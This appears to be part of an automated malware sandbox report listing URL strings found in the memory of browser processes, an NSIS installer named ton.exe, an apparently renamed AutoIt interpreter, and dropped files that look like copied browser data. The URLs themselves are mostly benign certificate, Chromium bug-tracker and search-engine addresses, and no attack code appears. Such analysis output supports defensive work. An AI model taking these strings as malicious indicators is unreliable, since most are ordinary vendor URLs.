    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
    Source: ton.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: ton.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: ton.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: ton.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: chrome.exe, 00000010.00000003.3423082645.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418796194.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3415865055.00004EB40033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
    Source: ton.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: ton.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: ton.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: ton.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: ton.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
    Source: chrome.exe, 00000010.00000003.3420962492.00004EB4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420843802.00004EB400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421086345.00004EB4010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421026227.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
    Source: ton.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: ton.exeString found in binary or memory: http://ocsp.digicert.com0
    Source: ton.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: ton.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: ton.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: chrome.exe, 00000010.00000003.3420996184.00004EB4010F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420962492.00004EB4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422808984.00004EB40100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420843802.00004EB400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422749770.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422718552.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421086345.00004EB4010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421026227.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422685338.00004EB400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
    Source: chrome.exe, 00000010.00000003.3420996184.00004EB4010F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420962492.00004EB4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422808984.00004EB40100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420843802.00004EB400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422749770.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422718552.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421086345.00004EB4010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421026227.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422685338.00004EB400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
    Source: chrome.exe, 00000010.00000003.3420996184.00004EB4010F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420962492.00004EB4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422808984.00004EB40100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420843802.00004EB400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422749770.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422718552.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421086345.00004EB4010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421026227.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422685338.00004EB400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
    Source: chrome.exe, 00000010.00000003.3420996184.00004EB4010F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420962492.00004EB4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422808984.00004EB40100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420843802.00004EB400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422749770.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422718552.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421086345.00004EB4010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421026227.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422685338.00004EB400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
    Source: Verzeichnis.com, 0000000B.00000000.2130360581.0000000000569000.00000002.00000001.01000000.00000006.sdmp, Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: ton.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: Q16P8Y.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: chrome.exe, 00000010.00000003.3444779003.00004EB400384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
    Source: chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: msedge.exe, 00000013.00000003.3569824179.000002ADB45B4000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.3646591296.000002ADB45B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://assets.msn.cn/resolver/
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://assets.msn.com/resolver/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://bard.google.com/
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://bit.ly/wb-precache
    Source: 79HDJ5.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
    Source: 79HDJ5.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://browser.events.data.msn.cn/
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://browser.events.data.msn.com/
    Source: Reporting and NEL.22.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://c.msn.com/
    Source: Q16P8Y.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: msedge.exe, 00000013.00000002.3649864394.000027F00238C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
    Source: manifest.json.21.drString found in binary or memory: https://chrome.google.com/webstore/
    Source: chrome.exe, 00000010.00000003.3473157104.00004EB401168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
    Source: chrome.exe, 00000010.00000003.3416961250.00004EB400384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417054894.00004EB400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423483980.00004EB400384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421260489.00004EB400D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3419492750.00004EB400EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423539365.00004EB400D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3419893625.00004EB400EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418502880.00004EB400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423505762.00004EB401318000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421293479.00004EB400EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417086277.00004EB400CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
